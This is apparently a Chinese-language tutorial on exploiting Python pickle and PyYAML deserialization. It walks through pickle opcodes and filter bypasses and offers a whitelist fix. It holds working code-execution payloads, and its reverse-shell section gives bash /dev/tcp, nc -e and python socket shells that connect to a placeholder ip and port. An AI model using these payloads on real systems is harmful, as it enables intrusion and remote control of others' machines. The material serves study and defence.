python的序列化和反序列化 与PHP,Java类似,python的序列化和反序列化就是对象与数据的相互转换,是为了解决对象传输与持久化存储问题
在Python中序列化一般通过pickle模块和json模块实现
pickle模块和json模块提供了dumps()、dump()、loads()、load()四个函数
函数 
说明 
 
 
dump() 
对象反序列化到文件对象并存入文件 
 
dumps() 
对象反序列化为 bytes 对象 
 
load() 
对象反序列化并从文件中读取数据 
 
loads() 
从 bytes 对象反序列化 
 
与json相比,pickle以二进制储存,不易人工阅读;json可以跨语言,而pickle是Python专用的;pickle能表示python几乎所有的类型(包括自定义类型),json只能表示一部分内置类型且不能表示自定义类型
PVM 
python序列化和反序列化的过程都是发生在PVM(Pickle Virtual Machine)上的,它是Python标准库中的一部分,由Python的pickle模块提供支持
 
pvm由指令处理器、栈区和内存区三部分组成
指令处理器:也就是引擎,从流中读取opcode和参数, 并对其进行解释处理. 重复这个动作, 直到遇到.这个结束符后停止, 最终留在栈顶的值将被作为反序列化对象返回
 
栈区:由Python的list实现, 被用来临时存储数据、参数以及对象, 在不断的进出栈过程中完成对数据流的反序列化操作, 并最终在栈顶生成反序列化的结果
 
内存区:或者称为标签区,由Python的dict实现, 为PVM的整个生命周期提供存储(将反序列化完成的数据以 key-value 的形式储存在memo中,以便后来使用)
 
 
PVM 协议 因为python版本的不同,所以默认使用的协议不同。因为PVM的指令集用的协议有很大的差别,所以不同的python版本序列化出来的数据是有差别的
可以通过protocol=num来选择opcode的版本,pickle协议是向前兼容的
1 2 3 4 5 6 7 8 9 10 11 import  pickleclass  Test :     def  __init__ (self, name='lewiserii'  ):         self .name = name test = Test()for  i in  range (6 ):     print ('[+] pickle v{}: {}' .format (str (i), pickle.dumps(test, protocol=i)))
 
1 2 3 4 5 6 [+] pickle v0: b'ccopy_reg\n_reconstructor\np0\n(c__main__\nTest\np1\nc__builtin__\nobject\np2\nNtp3\nRp4\n(dp5\nVname\np6\nVlewiserii\np7\nsb.'  [+] pickle v1: b'ccopy_reg\n_reconstructor\nq\x00(c__main__\nTest\nq\x01c__builtin__\nobject\nq\x02Ntq\x03Rq\x04}q\x05X\x04\x00\x00\x00nameq\x06X\t\x00\x00\x00lewiseriiq\x07sb.'  [+] pickle v2: b'\x80\x02c__main__\nTest\nq\x00)\x81q\x01}q\x02X\x04\x00\x00\x00nameq\x03X\t\x00\x00\x00lewiseriiq\x04sb.'  [+] pickle v3: b'\x80\x03c__main__\nTest\nq\x00)\x81q\x01}q\x02X\x04\x00\x00\x00nameq\x03X\t\x00\x00\x00lewiseriiq\x04sb.'  [+] pickle v4: b'\x80\x04\x95/\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x04Test\x94\x93\x94)\x81\x94}\x94\x8c\x04name\x94\x8c\tlewiserii\x94sb.'  [+] pickle v5: b'\x80\x05\x95/\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x04Test\x94\x93\x94)\x81\x94}\x94\x8c\x04name\x94\x8c\tlewiserii\x94sb.' 
 
不同版本间的区别
1 2 3 4 5 6 v0 版协议是原始的"人类可读"协议,并且向后兼容早期版本的 Python v1 版协议是较早的二进制格式,它也与早期版本的 Python 兼容 v2 版协议是在 Python 2.3 中加入的,它为存储 new-style class 提供了更高效的机制(参考 PEP 307) v3 版协议是在 Python 3.0 中加入的,它显式地支持 bytes 字节对象,不能使用 Python 2.x 解封。这是 Python 3.0-3.7 的默认协议 v4 版协议添加于 Python 3.4。它支持存储非常大的对象,能存储更多种类的对象,还包括一些针对数据格式的优化(参考 PEP 3154)。它是 Python 3.8 使用的默认协议 v5 版协议是在 Python 3.8 中加入的。它增加了对带外数据的支持,并可加速带内数据处理(参考 PEP 574)
 
opcode opcode也就是操作码,是序列化内容的核心,并且 opcode 是单字节的
在$PYTHON/Lib/pickle.py中可以查看到完整的opcode
以下是V0协议中一些常见的
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 MARK           = b'('     STOP           = b'.'     POP            = b'0'     POP_MARK       = b'1'     DUP            = b'2'     FLOAT          = b'F'     INT            = b'I'     NONE           = b'N'     REDUCE         = b'R'     STRING         = b'S'     UNICODE        = b'V'     APPEND         = b'a'     BUILD          = b'b'     GLOBAL         = b'c'     DICT           = b'd'     EMPTY_DICT     = b'}'     APPENDS        = b'e'     GET            = b'g'     INST           = b'i'     LIST           = b'l'     EMPTY_LIST     = b']'     OBJ            = b'o'     PUT            = b'p'     SETITEM        = b's'     TUPLE          = b't'     EMPTY_TUPLE    = b')'     SETITEMS       = b'u'    
 
处理序列化字节流的过程  这里用一段简短的字节码来演示利用过程:
1 2 3 4 cos system (S'whoami'  tR.
 
按照pickle.py中的源码分析处理序列化字节流的过程
c 
获取一个全局对象或 import 一个模块(会调用 import 语句,能够引入新的包),压入栈
源代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 def  load_global (self ):          module = self .readline()[:-1 ].decode("utf-8" )          name = self .readline()[:-1 ].decode("utf-8" )          klass = self .find_class(module, name)          self .append(klass) dispatch[GLOBAL[0 ]] = load_globaldef  find_class (self, module, name ):               sys.audit('pickle.find_class' , module, name)          if  self .proto < 3  and  self .fix_imports:                  if  (module, name) in  _compat_pickle.NAME_MAPPING:             module, name = _compat_pickle.NAME_MAPPING[(module, name)]                  elif  module in  _compat_pickle.IMPORT_MAPPING:             module = _compat_pickle.IMPORT_MAPPING[module]          __import__ (module, level=0 )          if  self .proto >= 4 :         return  _getattribute(sys.modules[module], name)[0 ]          else :         return  getattr (sys.modules[module], name)def  _getattribute (obj, name ):          for  subpath in  name.split('.' ):         if  subpath == '<locals>' :             raise  AttributeError("Can't get local attribute {!r} on {!r}"                                   .format (name, obj))         try :             parent = obj             obj = getattr (obj, subpath)         except  AttributeError:             raise  AttributeError("Can't get attribute {!r} on {!r}"                                   .format (name, obj)) from  None      return  obj, parent
 
( 
向栈中压入一个 MARK 标记
源代码:
1 2 3 4 5 6 7 8 def  load_mark (self ):          self .metastack.append(self .stack)          self .stack = []          self .append = self .stack.append dispatch[MARK[0 ]] = load_mark
 
S 
实例化一个字符串对象
源代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 def  load_string (self ):          data = self .readline()[:-1 ]          if  len (data) >= 2  and  data[0 ] == data[-1 ] and  data[0 ] in  b'"\'' :         data = data[1 :-1 ]     else :         raise  UnpicklingError("the STRING opcode argument must be quoted" )          self .append(self ._decode_string(codecs.escape_decode(data)[0 ])) dispatch[STRING[0 ]] = load_stringdef  _decode_string (self, value ):                    if  self .encoding == "bytes" :         return  value     else :         return  value.decode(self .encoding, self .errors)
 
t 
寻找栈中的上一个 MARK,并组合之间的数据为元组,弹出组合,弹出 MARK,压回结果
源代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 def  load_tuple (self ):          items = self .pop_mark()          self .append(tuple (items)) dispatch[TUPLE[0 ]] = load_tupledef  pop_mark (self ):          items = self .stack          self .stack = self .metastack.pop()     self .append = self .stack.append     return  items
 
R 
从栈上弹出两个对象,第一个对象作为参数(必须为元组),第二个对象作为函数,然后调用该函数并把结果压回栈
源代码:
1 2 3 4 5 6 7 8 9 def  load_reduce (self ):     stack = self .stack          args = stack.pop()          func = stack[-1 ]          stack[-1 ] = func(*args) dispatch[REDUCE[0 ]] = load_reduce
 
. 
程序结束,栈顶的一个元素作为 pickle.loads() 的返回值
源代码:
1 2 3 4 5 6 def  load_stop (self ):          value = self .stack.pop()     raise  _Stop(value) dispatch[STOP[0 ]] = load_stop
 
所以可以得到以下解释
c后面跟的是模块名,换行之后的是类名,相当于将os.system放入栈中,然后放入一个标记符,接着将字符串 whoami 放入栈中,遇到t将栈中的数据弹出,一直到标记,并转为 tuple 再存入栈中,同时标记符消失,遇到R后将元组取出,作为参数放入函数中执行后将结果返回
可以看作执行了os.system('whoami')
当字节码很多的时候一个一个对着表去读会很麻烦,所以Python提供了pickletools工具,便于人工解读opcode
pickletools常用的有pickletools.dis和pickletools.optimize
pickletools.dis:具有反汇编的功能,可以以可读性较强的方式展示一个序列化对象
pickletools.optimize:对一个序列化结果进行优化(消除未使用的 PUT 操作码)
常见利用思路 漏洞产生原因是用户可控的反序列化入口点
魔术方法 __reduce__() 
PVM 的 操作码 R 就是 __reduce__() 的返回值的一个底层实现 与php中的__wakeup()方法类似,python在反序列化时会先调用__reduce__()魔术方法,所以我们可以利用这一特点触发恶意代码
 
一个利用__reduce__()的例子,在能够传入可控的 pickle.loads 的 data 时就可以生效
但是需要注意reduce一次只能执行一个函数
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 import  pickleimport  pickletoolsimport  osclass  Test (object ):     def  __reduce__ (self ):         shell = """whoami"""                    return  os.system, (shell,)     test = Test() a = pickle.dumps(test, protocol=0 ) pickle.loads(a)print (a) pickletools.dis(pickletools.optimize(a))
 
全局变量覆盖 
可以通过覆盖一些凭证达到绕过身份验证的目的
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 import  pickleimport  pickletoolsimport  secretprint ("变量的值为:"  + secret.key) opcode = b'''c__main__ secret (S'key' S'123' db.'''  pickle.loads(opcode)print ("变量的值为:"  + secret.key) pickletools.dis(opcode)
 
全局变量引用 1 2 3 4 5 6 7 8 9 10 11 12 13 14 import  pickleimport  pickletoolsimport  secretclass  Target :     def  __init__ (self ):         obj = pickle.loads(b'ccopy_reg\n_reconstructor\n(c__main__\nTarget\nc__builtin__\nobject\nNtR(dVpwd\nVa\nsb.' )         if  obj.pwd == secret.pwd:             print ("Hello, admin!" )         else :             print ("No" ) test = Target()
 
上面的例子中我们并不知道secret.pwd的值,要使if成立,可以使用c来实现
c的作用是 获取一个全局对象或 import 一个模块(会调用 import 语句,能够引入新的包),压入栈
1 2 3 b'ccopy_reg\n_reconstructor\n(c__main__\nTarget\nc__builtin__\nobject\nNtR(dVpwd\nVaaa\nsb.' b'ccopy_reg\n_reconstructor\n(c__main__\nTarget\nc__builtin__\nobject\nNtR(dVpwd\ncsecret\npwd\nsb.' 
 
与php反序列化中的$this->b = &$this->a;引用绕过类似,只不过python用的是import
 
命令执行 pickle中用来构造函数执行的字节码有四个个:R、i、o以及b +__setstate__()
R 上文 中提到的例子用的就是R来实现Rce
R: 从栈上弹出两个对象,第一个对象作为参数(必须为元组),第二个对象作为函数,然后调用该函数并把结果压回栈
 
1 2 3 4 opcode=b'''cos system (S'whoami' tR.''' 
 
i 
相当于 c 和 o 的组合,先获取一个全局函数,然后从栈顶开始寻找栈中的上一个 MARK,并组合之间的数据为元组,以该元组为参数执行全局函数(或实例化一个对象)
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 def  load_inst (self ):          module = self .readline()[:-1 ].decode("ascii" )     name = self .readline()[:-1 ].decode("ascii" )     klass = self .find_class(module, name)          self ._instantiate(klass, self .pop_mark()) dispatch[INST[0 ]] = load_instdef  _instantiate (self, klass, args ):     if  (args or  not  isinstance (klass, type ) or          hasattr (klass, "__getinitargs__" )):         try :             value = klass(*args)         except  TypeError as  err:             raise  TypeError("in constructor for %s: %s"  %                             (klass.__name__, str (err)), sys.exc_info()[2 ])     else :         value = klass.__new__(klass)     self .append(value)
 
1 2 3 4 opcode=b'''(S'whoami' ios system .''' 
 
o 
从栈顶开始寻找栈中的上一个 MARK,以之间的第一个数据(必须为函数)为 callable,第二个到第 n 个数据为参数,执行该函数(或实例化一个对象),弹出 MARK,压回结果
 
1 2 3 4 5 6 7 8 def  load_obj (self ):          args = self .pop_mark()          cls = args.pop(0 )          self ._instantiate(cls, args) dispatch[OBJ[0 ]] = load_obj
 
1 2 3 4 opcode=b'''(cos system S'whoami' o.''' 
 
b + __setstate__() 
使用栈中的第一个元素(储存多个 属性名-属性值 的字典)对第二个元素(对象实例)进行属性设置,调用 __setstate__ 或 __dict__.update()
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 def  load_build (self ):     stack = self .stack          state = stack.pop()          inst = stack[-1 ]          setstate = getattr (inst, "__setstate__" , None )               if  setstate is  not  None :         setstate(state)         return      slotstate = None           if  isinstance (state, tuple ) and  len (state) == 2 :         state, slotstate = state     if  state:         inst_dict = inst.__dict__         intern = sys.intern                  for  k, v in  state.items():             if  type (k) is  str :                 inst_dict[intern(k)] = v             else :                 inst_dict[k] = v     if  slotstate:                  for  k, v in  slotstate.items():             setattr (inst, k, v) dispatch[BUILD[0 ]] = load_build
 
因为一般不存在__setstate__,所以不会触发setstate(state)。但是如果手动压入一个字典{"__setstate__":os.system},执行b。就会添加一个新的键值对,再继续压入命令,再执行b时,setstate就不会为None了,而是我们传入的os.system,就是os.system(state),而state就是我们传入的命令,从而完成rce
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 import  pickleimport  pickletoolsclass  Test (object ):     def  __init__ (self, name ):         self .name = "aa"  opcode = b'''(c__main__ Test )o(S"__setstate__" cos system dbS"whoami" b.'''  pickle.loads(opcode) pickletools.dis(opcode)''' lewiserii\lewiserii     0: (    MARK     1: c        GLOBAL     '__main__ Test'    16: )        EMPTY_TUPLE    17: o        OBJ        (MARK at 0)    18: (    MARK    19: S        STRING     '__setstate__'    35: c        GLOBAL     'os system'    46: d        DICT       (MARK at 18)    47: b    BUILD    48: S    STRING     'whoami'    58: b    BUILD    59: .    STOP highest protocol among opcodes = 1 ''' 
 
反弹shell 既然可以执行命令了,那么肯定可以反弹shell了,以下是几种payload
利用i执行命令建立shell 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 import  base64import  pickle payload= b'''(S'python -c 'import os,pty,socket;s=socket.socket();s.connect(("ip", port));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/sh")'' ios system .'''  payload2 = b'''(S'bash -c "bash -i >& /dev/tcp/ip/port 0>&1"' ios popen .''' print (base64.b64encode(pickle.dumps(payload)))
 
reduce直接执行nc命令 
1 2 3 4 5 6 7 8 9 import  base64import  pickleclass  Test (object ):     def  __reduce__ (self ):         return  (eval , ("__import__('os').system('nc ip port -e/bin/sh')" ,)) payload = Test()print (base64.b64encode(pickle.dumps(payload)))
 
pker 
pker 是由eddieivan01编写的以遍历Python AST的形式来自动化解析pickle opcode的工具。
 
漏洞修复  对于pickle反序列化漏洞,常见的修复方法是重写Unpickler.find_class()来限制全局变量
例如:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 import  builtinsimport  ioimport  pickle safe_builtins = {     'range' ,             'complex' ,           'set' ,               'frozenset' ,         'slice' ,         }class  RestrictedUnpickler (pickle.Unpickler):          def  find_class (self, module, name ):                  if  module == "builtins"  and  name in  safe_builtins:             return  getattr (builtins, name)                  raise  pickle.UnpicklingError("global '%s.%s' is forbidden"  %                                      (module, name))def  restricted_loads (s ):          return  RestrictedUnpickler(io.BytesIO(s)).load() opcode=b"cos\nsystem\n(S'echo hello world'\ntR."  restricted_loads(opcode) Traceback (most recent call last): ... _pickle.UnpicklingError: global  'os.system'  is  forbidden
 
以上例子通过重写Unpickler.find_class()方法,限制调用模块只能为builtins,且函数必须在白名单内,否则抛出异常。
bypass 关键字绕过 
利用opcode进行变量覆盖时,代码中可能会过滤了我们想要覆盖的属性关键字
 
例如
1 2 3 4 5 6 7 8 9 10 11 12 import  pickleimport  pickletoolsimport  secretprint ("变量的值为:"  + secret.key)if  b'key'  in  opcode:     print ('NoNoNo' )else :     pickle.loads(opcode)print ("变量的值为:"  + str (secret.key))
 
正常的opcode应该是
1 2 3 4 5 opcode = b'''c__main__ secret (S'key' S'123' db.''' 
 
方法一:十六进制 
因为 S 操作符是可以识别十六进制的,所以这里也可以对字符进行十六进制编码来绕过
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 import  pickleimport  pickletoolsimport  secretprint ("变量的值为:"  + secret.key) opcode = b'''c__main__ secret (S'\\x6B\\x65\\x79' S'111' db.''' if  b'key'  in  opcode:     print ('NoNoNo' )else :     pickle.loads(opcode)print ("变量的值为:"  + str (secret.key))''' 变量的值为:123 变量的值为:111 ''' 
 
方法二:unicode编码 
同样的,V 操作符也可以识别unicode编码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 import  pickleimport  pickletoolsimport  secretprint ("变量的值为:"  + secret.key) opcode = b'''c__main__ secret (V\u006b\u0065\u0079 S'111111' db.''' if  b'key'  in  opcode:     print ('NoNoNo' )else :     pickle.loads(opcode)print ("变量的值为:"  + str (secret.key))''' 变量的值为:123 变量的值为:111111 ''' 
 
方法三:利用内置函数获取关键字 
在python中,当我们导入某个模块后,可以通过dir(sys.modules['xxx'])来获取其全部属性
例如
1 2 3 4 5 6 7 8 import  secretimport  sysprint (dir (sys.modules['secret' ]))''' ['__builtins__', '__cached__', '__doc__', '__file__', '__loader__', '__name__', '__package__', '__spec__', 'key'] ''' 
 
但是因为pickle不持支列表索引和字典索引,所以需要用reversed()+next()来获取元素
1 2 3 4 5 6 7 8 import  secretimport  sysprint (next (reversed (dir (sys.modules['secret' ]))))''' key ''' 
 
转换成opcode
1 2 3 4 5 6  opcode=b'''(c__main__ secret i__builtin__ dir .''' 
 
1 2 3 4 5 6 7 8  opcode=b'''((c__main__ secret i__builtin__ dir i__builtin__ reversed .''' 
 
1 2 3 4 5 6 7 8 9 10  opcode=b'''(((c__main__ secret i__builtin__ dir i__builtin__ reversed i__builtin__ next .''' 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 import  pickleimport  pickletoolsimport  secretprint ("变量的值为:"  + secret.key) opcode=b'''c__main__ secret ((((c__main__ secret i__builtin__ dir i__builtin__ reversed i__builtin__ next S'111' db.''' if  b'key'  in  opcode:     print ('NoNoNo' )else :     pickle.loads(opcode)print ("变量的值为:"  + str (secret.key))''' 变量的值为:123 变量的值为:111 ''' 
 
绕过builtins 对于上文 提到的重写find_class()方法来限制调用模块,如果采用的是黑名单的方式,那么就有可能绕过其限制
例如code-breaking 2018 picklecode 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 import  pickleimport  ioimport  builtinsclass  RestrictedUnpickler (pickle.Unpickler):     blacklist = {'eval' , 'exec' , 'execfile' , 'compile' , 'open' , 'input' , '__import__' , 'exit' }     def  find_class (self, module, name ):                  if  module == "builtins"  and  name not  in  self .blacklist:             return  getattr (builtins, name)                  raise  pickle.UnpicklingError("global '%s.%s' is forbidden"  %                                      (module, name))def  restricted_loads (s ):     """Helper function analogous to pickle.loads()."""      return  RestrictedUnpickler(io.BytesIO(s)).load()
 
同样是限制了使用的模块只能为builtins,加上一个黑名单。但是我们可以利用getattr来获取一些黑名单函数,例如builtins.getattr('builtins', 'eval')
转换成payload:builtins.getattr(builtins, 'eval'),('__import__("os").system("whoami")',)
然后开始手搓opcode
首先调用builtins.getattr
 
然后注意不能直接压入builtins,需要构造出一个builtins模块再来传给getattr
例如可以从builtins.globals()中拿到builtins模块,但是因为返回值是<class 'dict'>,所以还需要一个builtins.dict中的get函数来取出builtins
变换后的payload:builtins.getattr(builtins.getattr(builtins.dict,'get')(builtins.globals(),'builtins'),'eval')('__import__("os").system("whoami")',)
继续编写opcode
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 import  pickleimport  pickletools opcode = b'''cbuiltins getattr (cbuiltins dict S'get' tR. '''  pickletools.dis(opcode)print (pickle.loads(opcode))'''     0: c    GLOBAL     'builtins getattr'    18: (    MARK    19: c        GLOBAL     'builtins dict'    34: S        STRING     'get'    41: t        TUPLE      (MARK at 18)    42: R    REDUCE    43: .    STOP highest protocol among opcodes = 0 <method 'get' of 'dict' objects> ''' 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 import  pickleimport  pickletools opcode = b'''cbuiltins globals )R. '''  pickletools.dis(opcode)print (pickle.loads(opcode))'''     0: c    GLOBAL     'builtins globals'    18: )    EMPTY_TUPLE    19: R    REDUCE    20: .    STOP highest protocol among opcodes = 1 {'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x000002490202C9D0>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, '__file__': 'C:\\Users\\lewiserii\\Desktop\\test\\2.py', '__cached__': None, 'pickle': <module 'pickle' from 'C:\\Python\\Python311\\Lib\\pickle.py'>, 'pickletools': <module 'pickletools' from 'C:\\Python\\Python311\\Lib\\pickletools.py'>, 'opcode': b'cbuiltins\nglobals\n)R.\n'} ''' 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 import  pickleimport  pickletools opcode = b'''cbuiltins getattr (cbuiltins dict S'get' tR(cbuiltins globals )RS'__builtins__' tR.'''  pickletools.dis(opcode)print (pickle.loads(opcode))'''     0: c    GLOBAL     'builtins getattr'    18: (    MARK    19: c        GLOBAL     'builtins dict'    34: S        STRING     'get'    41: t        TUPLE      (MARK at 18)    42: R    REDUCE    43: (    MARK    44: c        GLOBAL     'builtins globals'    62: )        EMPTY_TUPLE    63: R        REDUCE    64: S        STRING     '__builtins__'    80: t        TUPLE      (MARK at 43)    81: R    REDUCE    82: .    STOP highest protocol among opcodes = 1 <module 'builtins' (built-in)> ''' 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 import  pickleimport  pickletools opcode=b'''cbuiltins getattr (cbuiltins getattr (cbuiltins dict S'get' tR(cbuiltins globals )RS'__builtins__' tRS'eval' tR.'''  pickletools.dis(opcode)print (pickle.loads(opcode))'''     0: c    GLOBAL     'builtins getattr'    18: (    MARK    19: c        GLOBAL     'builtins getattr'    37: (        MARK    38: c            GLOBAL     'builtins dict'    53: S            STRING     'get'    60: t            TUPLE      (MARK at 37)    61: R        REDUCE    62: (        MARK    63: c            GLOBAL     'builtins globals'    81: )            EMPTY_TUPLE    82: R            REDUCE    83: S            STRING     '__builtins__'    99: t            TUPLE      (MARK at 62)   100: R        REDUCE   101: S        STRING     'eval'   109: t        TUPLE      (MARK at 18)   110: R    REDUCE   111: .    STOP highest protocol among opcodes = 1 <built-in function eval> ''' 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 import  pickleimport  pickletools opcode=b'''cbuiltins getattr (cbuiltins getattr (cbuiltins dict S'get' tR(cbuiltins globals )RS'__builtins__' tRS'eval' tR(S'__import__("os").system("whoami")' tR. '''  pickletools.dis(opcode)print (pickle.loads(opcode))'''     0: c    GLOBAL     'builtins getattr'    18: (    MARK    19: c        GLOBAL     'builtins getattr'    37: (        MARK    38: c            GLOBAL     'builtins dict'    53: S            STRING     'get'    60: t            TUPLE      (MARK at 37)    61: R        REDUCE    62: (        MARK    63: c            GLOBAL     'builtins globals'    81: )            EMPTY_TUPLE    82: R            REDUCE    83: S            STRING     '__builtins__'    99: t            TUPLE      (MARK at 62)   100: R        REDUCE   101: S        STRING     'eval'   109: t        TUPLE      (MARK at 18)   110: R    REDUCE   111: (    MARK   112: S        STRING     '__import__("os").system("whoami")'   149: t        TUPLE      (MARK at 111)   150: R    REDUCE   151: .    STOP highest protocol among opcodes = 1 lewiserii\lewiserii 0 ''' 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 import  pickleimport  pickletools opcode = b'\x80\x03(cbuiltins\ngetattr\np0\ncbuiltins\ndict\np1\nX\x03\x00\x00\x00getop2\n0(g2\n(cbuiltins\nglobals\noX\x0C\x00\x00\x00__builtins__op3\n(g0\ng3\nX\x04\x00\x00\x00evalop4\n(g4\nX\x21\x00\x00\x00__import__("os").system("whoami")o00.'  pickletools.dis(pickletools.optimize(opcode)) pickle.loads(opcode)'''     0: \x80 PROTO      3     2: (    MARK     3: c        GLOBAL     'builtins getattr'    21: q        BINPUT     0    23: c        GLOBAL     'builtins dict'    38: X        BINUNICODE 'get'    46: o        OBJ        (MARK at 2)    47: q    BINPUT     1    49: 0    POP    50: (    MARK    51: h        BINGET     1    53: (        MARK    54: c            GLOBAL     'builtins globals'    72: o            OBJ        (MARK at 53)    73: X        BINUNICODE '__builtins__'    90: o        OBJ        (MARK at 50)    91: q    BINPUT     2    93: (    MARK    94: h        BINGET     0    96: h        BINGET     2    98: X        BINUNICODE 'eval'   107: o        OBJ        (MARK at 93)   108: q    BINPUT     3   110: (    MARK   111: h        BINGET     3   113: X        BINUNICODE '__import__("os").system("whoami")'   151: o        OBJ        (MARK at 110)   152: 0    POP   153: 0    POP   154: .    STOP highest protocol among opcodes = 2 lewiserii\lewiserii ''' 
 
opcode版本 有时可以通过改变opcode的版本来绕过一些对字母的过滤
PyYAML 反序列化 基础语法规则 1:大小写敏感
2:使用空格代替tab键缩进表示层级,对齐即可表示同级
3:和python一样使用’#’注释内容
4:!!表示强制类型转换
5:一个 .yml 文件中可以有多份配置文件,用 — 隔开
更多的语法规则可以看官方手册 或菜鸟教程 等
类型转换 在PyYAML中,可以通过 !! 来进行类型转换
site-packages/yaml/constructor.py中可以看到基础的类型转换过程
例如
1 2 3 4 5 6 7 8 9 10 11 import  yaml data = yaml.load('!!str 111' )print (data)print (type (data))''' 111 <type 'str'> ''' 
 
对应的代码如下,add_constructor定义了一些基础的类型转换
1 2 3 SafeConstructor.add_constructor(         u'tag:yaml.org,2002:str' ,         SafeConstructor.construct_yaml_str)
 
1 2 3 4 5 def  add_constructor (cls, tag, constructor ):     if  not  'yaml_constructors'  in  cls.__dict__:         cls.yaml_constructors = cls.yaml_constructors.copy()     cls.yaml_constructors[tag] = constructor add_constructor = classmethod (add_constructor)
 
str对应的函数是 construct_yaml_str,下断点分析
1 2 3 4 5 6 def  construct_yaml_str (self, node ):     value = self .construct_scalar(node)     try :         return  value.encode('ascii' )     except  UnicodeEncodeError:         return  value
 
1 2 3 4 5 6 def  construct_scalar (self, node ):     if  isinstance (node, MappingNode):         for  key_node, value_node in  node.value:             if  key_node.tag == u'tag:yaml.org,2002:value' :                 return  self .construct_scalar(value_node)     return  BaseConstructor.construct_scalar(self , node)
 
1 2 3 4 5 6 def  construct_scalar (self, node ):     if  not  isinstance (node, ScalarNode):         raise  ConstructorError(None , None ,                 "expected a scalar node, but found %s"  % node.id ,                 node.start_mark)     return  node.value
 
可以看到转换的过程,包括node的值
当然除了add_constructor定义的基础类型外还有add_multi_constructor定义的5个complex python tag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 Constructor.add_multi_constructor(     u'tag:yaml.org,2002:python/name:' ,     Constructor.construct_python_name) Constructor.add_multi_constructor(     u'tag:yaml.org,2002:python/module:' ,     Constructor.construct_python_module) Constructor.add_multi_constructor(     u'tag:yaml.org,2002:python/object:' ,     Constructor.construct_python_object) Constructor.add_multi_constructor(     u'tag:yaml.org,2002:python/object/apply:' ,     Constructor.construct_python_object_apply) Constructor.add_multi_constructor(     u'tag:yaml.org,2002:python/object/new:' ,     Constructor.construct_python_object_new)
 
根据图表可以看到这几个都可以引入新的模块,这正是 PyYAML 存在反序列化漏洞的原因
PyYAML < 5.1 PyYAML 的利用划分以版本 5.1 为界限,5.1以下利用相对较简单,5.1以上利用相对稍麻烦
<5.1的版本中一共有三个构造器,分别是
1 2 3 BaseConstructor:最最基础的构造器,不支持强制类型转换 SafeConstructor:集成 BaseConstructor,强制类型转换和 YAML 规范保持一致,没有魔改 Constructor:在 YAML 规范上新增了很多强制类型转换,是默认使用的构造器
 
python/object/apply construct_python_object_apply
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 def  construct_python_object_apply (self, suffix, node, newobj=False  ):                                                                                                            if  isinstance (node, SequenceNode):             args = self .construct_sequence(node, deep=True )             kwds = {}             state = {}             listitems = []             dictitems = {}         else :             value = self .construct_mapping(node, deep=True )             args = value.get('args' , [])             kwds = value.get('kwds' , {})             state = value.get('state' , {})             listitems = value.get('listitems' , [])             dictitems = value.get('dictitems' , {})                  instance = self .make_python_instance(suffix, node, args, kwds, newobj)         if  state:             self .set_python_instance_state(instance, state)         if  listitems:             instance.extend(listitems)         if  dictitems:             for  key in  dictitems:                 instance[key] = dictitems[key]         return  instance
 
调用 make_python_instance 获取模块中的方法并执行
payload
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31  yaml.load('!!python/object/apply:os.system ["whoami"]' ) yaml.load("!!python/object/apply:os.system ['whoami']" ) yaml.load("!!python/object/apply:os.system [whoami]" ) yaml.load("!!python/object/apply:subprocess.Popen ['whoami']" ) yaml.load("exp: !!python/object/apply:os.system [whoami]" ) yaml.load(""" exp: !!python/object/apply:os.system - whoami """ ) yaml.load(""" exp: !!python/object/apply:os.system   args: ["whoami"] """ ) yaml.load(""" exp: !!python/object/apply:os.system   kwds: {"command": "whoami"} """ ) yaml.load(""" !!python/object/apply:os.system - whoami """ )
 
